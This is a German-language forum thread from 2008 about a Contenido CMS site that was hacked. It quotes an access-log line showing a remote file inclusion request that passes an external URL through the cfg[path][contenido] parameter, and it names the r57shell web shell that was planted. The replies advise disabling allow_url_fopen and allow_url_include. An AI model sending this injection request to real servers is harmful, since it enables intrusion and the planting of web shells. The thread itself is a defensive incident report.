Server über Contenido gehackt - unsicherer Code?

walter999 · Beitrag von **walter999** » Do 5. Jun 2008, 08:04

Mein Provider teilte mir gestern mit das mein Account gehackt worden ist.

Folgender Eintrag befindet sich in der Access-Log:

Code: Alles auswählen

- - [03/Jun/2008:23:32:27 +0200] "POST 
/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.churchlawgroup.com/amember/main.txt.t
xt? HTTP/1.0" 200 33327 
http://www.MEINE_ANGEGRIFFENE_DOMAIN.com/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.churchlawgro
up.com/amember/main.txt.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Daraufhin habe ich natürlich gesucht und eine eingeschleuste Datei gefunden.
Die Datei ist eine bekannte Hackdatei: r57shell.php
Sie wurde unter dem Namen include.html.php im include-Verzeichnis gespeichert. Ich habe diese natürlich sofort gelöscht.

Mein Anbieter teilte mir folgendes mit:

Das ist die unsichere Variable in diesem aufgerufenen Script welche dann für einen so genannten CodeInjection missbraucht wurde:

cfg[path][contenido]=

Und dieser unsicheren Variable wurde diese URL angehängt:

http://www.churchlawgroup.com/amember/main.txt.txt?

Diese externe Textdatei enhält reinen Quellcode über den Angreifer zB. eine Art Dateiexplorer ausführen um fremde Dateien auf Ihren Account zu schieben.

Kann dies einer der Contenido-Entwickler bestätigen?

Ich bitte Euch schnellstmöglich einen Patch dafür bereitzustellen.

Vielen Dank und viele Grüße
Walter

Beitrag von **emergence** » Do 5. Jun 2008, 09:17

welche contenido version ?
welche php version ?

Beitrag von **Dodger77** » Do 5. Jun 2008, 09:45

emergence hat geschrieben:welche contenido version ?

Ich vermute mal 4.6.4 oder früher.

walter999 · Beitrag von **walter999** » Do 5. Jun 2008, 10:17

Sorry hab ich total vergessen zu nennen:

Contenido-Version: 4.6.4 (ist schon ein älteres Projekt)
PHP-Version: 4.4.8

Gibts dazu Sicherheitspatches oder müßte man komplett updaten (was ich eigentlich vermeiden möchte da ziemlich viel individuell umprogrammiert wurde und manche Module da sicher Probleme machen weren.

Viele Grüße und danke
Walter

MichFress · Beitrag von **MichFress** » Do 5. Jun 2008, 11:19

Kennst du das hier schon? http://forum.contenido.org/viewtopic.php?t=18795

walter999 · Beitrag von **walter999** » Do 5. Jun 2008, 11:24

Danke kannte ich noch nicht obwohl ich vorher die Suche bemühte. Vielleicht hab ich zu spezifisch für mein Problem gesucht.

Danke!!!

Grüße
Walter

rethus · Beitrag von **rethus** » Do 5. Jun 2008, 11:47

Ich kann nur empfehlen, lasst euch unbeding allow_url_follow für euren Webspace deaktivieren. Das erspart Euch eine menge Ärger, in Sachen php-injection.

quacon · Beitrag von **quacon** » Do 19. Jun 2008, 14:00

allow_url_follow? Du meinst sicherlich allow_url_fopen und für PHP 5 allow_url_include. allow_url_follow ist mir nicht bekannt. In der Tat sollte man beide auf "off" setzen. Viele Grüße, quacon